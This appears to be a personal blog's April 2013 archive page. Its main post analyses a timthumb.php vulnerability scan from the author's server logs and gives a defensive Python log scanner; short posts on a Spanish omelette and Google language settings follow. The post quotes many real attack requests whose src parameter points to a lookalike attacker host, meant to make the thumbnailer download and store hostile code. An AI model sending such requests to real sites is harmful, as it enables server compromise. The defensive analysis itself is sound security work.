
Monthly Archives: April 2013


One of today’s attacks to this web server

Posted by in Computer Security, Crime, Technology | April 29, 2013

My web server was attacked by some guy in Germany last night. This happens several times a day, so it’s usually not a concern. This time it happened while I was monitoring the server, so I had some fun looking at what the attacker was trying to do.

When I’m working on the computer at home I usually have a terminal window open in the background. In this window I’m usually watching all requests to my web server in real time. Most of the time I don’t pay attention to it (it’s mostly search engines crawling my domains), but sometimes you catch something interesting. This is an example of the kind of attack hitting every web server on the Internet many times a day.

I was having dinner when I saw several strange requests to the Varnish server in front of my backend web server:

85.214.110.68 - - [28/Apr/2013:22:47:48 +0900] "GET /wp-content/themes/Momento/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 400 300 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:47:49 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:47:50 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3589 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:47:52 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//assets/js/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:47:52 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/assets/js/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3589 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:47:54 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//extensions/auto-thumb/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:47:55 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/extensions/auto-thumb/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3589 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:47:56 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//functions/efrog/lib/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:47:57 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/functions/efrog/lib/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:47:58 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//functions/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:47:59 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/functions/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:00 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//fws/addons/timthumb/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:01 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/fws/addons/timthumb/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:03 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//library/functions/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:03 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/library/functions/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:05 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//helpers/timthumb/image.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:05 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/helpers/timthumb/image.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:07 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//images/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:08 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/images/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:09 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//inc/classes/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:10 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/inc/classes/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:11 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//inc/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:12 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/inc/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:14 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//include/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:14 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/include/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:16 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//includes/functions/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:16 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/includes/functions/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:18 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//includes/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:19 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/includes/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:20 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//includes/timthumb/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:21 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/includes/timthumb/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:22 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//js/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:23 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/js/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:25 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//lib/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
[...additional lines omitted...]

(Actually, these logs are from the backend web server running Apache. I’m not storing the request log on the Varnish machine.)

This guy was obviously scanning the web server for a script called timthumb.php, trying one plugin and theme path after another. A quick search on Google shows that there was indeed a security problem with older versions of this program. It was possible to trick it into downloading a file from an attacker’s host and saving it on the server, where it could later be executed in order to compromise the system (see this link for details.)
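The scan above is easy to pick out of a log by hand, but it is also easy to detect automatically. The following is an added example (not code from the post or from timthumb itself) that parses Apache combined-format lines like the ones shown, counts per client IP the timthumb requests whose src= parameter points outside an assumed allowlist of image hosts, and contrasts a substring allowlist check with a proper host-suffix check: the src host in the log, flickr.com.finnovations.de, is built to look like flickr.com, and a check that only tests whether "flickr.com" appears somewhere in the hostname would accept it. The sample log, the ALLOWED_HOSTS list and all function names are constructed for this example.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Constructed sample in Apache combined log format, modelled on the lines in the post
# (two probe lines as seen there, one legitimate Flickr thumbnail request, one crawler hit).
SAMPLE_LOG = """\
85.214.110.68 - - [28/Apr/2013:22:47:48 +0900] "GET /wp-content/themes/Momento/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 400 300 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
85.214.110.68 - - [28/Apr/2013:22:47:50 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3589 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
203.0.113.7 - - [28/Apr/2013:22:50:01 +0900] "GET /wp-content/themes/Momento/timthumb.php?src=http://farm1.static.flickr.com/1/2.jpg&w=100 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.9 - - [28/Apr/2013:22:51:12 +0900] "GET /index.php HTTP/1.1" 200 8000 "-" "Googlebot/2.1"
"""

# Apache "combined" format: ip ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Assumed allowlist of image hosts the thumbnailer is permitted to fetch from.
ALLOWED_HOSTS = ("flickr.com", "picasa.com", "img.youtube.com")


def host_allowed_substring(host):
    """Weak check: accepts the host if an allowed name appears anywhere in it,
    so 'flickr.com.example' passes even though it is not Flickr."""
    return any(a in host.lower() for a in ALLOWED_HOSTS)


def host_allowed_suffix(host):
    """Correct check: the host must be an allowed name or a subdomain of one."""
    host = host.lower().rstrip(".")
    return any(host == a or host.endswith("." + a) for a in ALLOWED_HOSTS)


def parse_line(line):
    """Split one combined-format line into fields; returns None on malformed input."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["query"] = parse_qs(parts.query)
    return rec


def src_hosts(rec):
    """Hostnames named in the request's src= parameter(s); absolute URLs only."""
    hosts = []
    for src in rec["query"].get("src", []):
        h = urlsplit(src).hostname
        if h:
            hosts.append(h)
    return hosts


def is_timthumb_request(rec):
    """True when the request targets timthumb.php or a script under a timthumb/ directory."""
    path = rec["path"]
    return path.endswith("/timthumb.php") or "/timthumb/" in path


def scan_log(text):
    """Count, per client IP, timthumb requests whose src host is outside the allowlist."""
    hits = Counter()
    for line in text.splitlines():
        rec = parse_line(line)
        if not rec or not is_timthumb_request(rec):
            continue
        if any(not host_allowed_suffix(h) for h in src_hosts(rec)):
            hits[rec["ip"]] += 1
    return dict(hits)


def lookalike_hosts(text):
    """Hosts that a substring allowlist would accept but the suffix check rejects."""
    found = set()
    for line in text.splitlines():
        rec = parse_line(line)
        if rec and is_timthumb_request(rec):
            for h in src_hosts(rec):
                if host_allowed_substring(h) and not host_allowed_suffix(h):
                    found.add(h)
    return sorted(found)


if __name__ == "__main__":
    for ip, n in scan_log(SAMPLE_LOG).items():
        print(f"{ip}: {n} timthumb request(s) with an off-allowlist src host")
    print("lookalike hosts:", lookalike_hosts(SAMPLE_LOG))
```

Run against a real access log, the per-IP counts are what you would feed a firewall rule or a monitoring alert; note that the legitimate farm1.static.flickr.com request is not flagged, because the suffix check accepts genuine subdomains of an allowed host while still rejecting a name that merely contains it.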


My world-famous Spanish Omelette recipe

Posted by in Food, How-to | April 28, 2013

By popular request (popular meaning my coworkers’), here’s how I cook my Spanish omelette.

Ingredients (for 4-5 people)

[photo: spanish_omelette_2]

  • 7-8 medium-sized potatoes
  • 1 medium-sized onion
  • 8 eggs
  • Olive oil (I used a 450cc bottle)
  • Salt
  • A bit of milk (1/3 of a small glass)

Keep reading for the full recipe.


Language settings in Google suck

Posted by in Rants, Technology | April 21, 2013

To the guys doing interface design at Google: for fuck’s sake, do something already about the language settings on your search interface.

This is an example of what I see every day when I’m searching things on Google while logged in to my account. Notice that the interface and the search results are in Japanese:

[screenshot: google-search-japanese-results]

Yes, I can read Japanese, but that’s not the point. My Google account is configured to display an English interface and provide search results from English sites, and I would expect these settings to work from a company like Google:

[screenshot: google-language-settings]

Manually going to http://www.google.com/intl/en works, but I’d rather not have to enter the URL manually every time I need to search for something. To make things more fun, logging out from my Google account also displays an English interface with English search results, because that’s the primary language on my web browser.

I’m sure I’m not the first person complaining about this. Please do something already.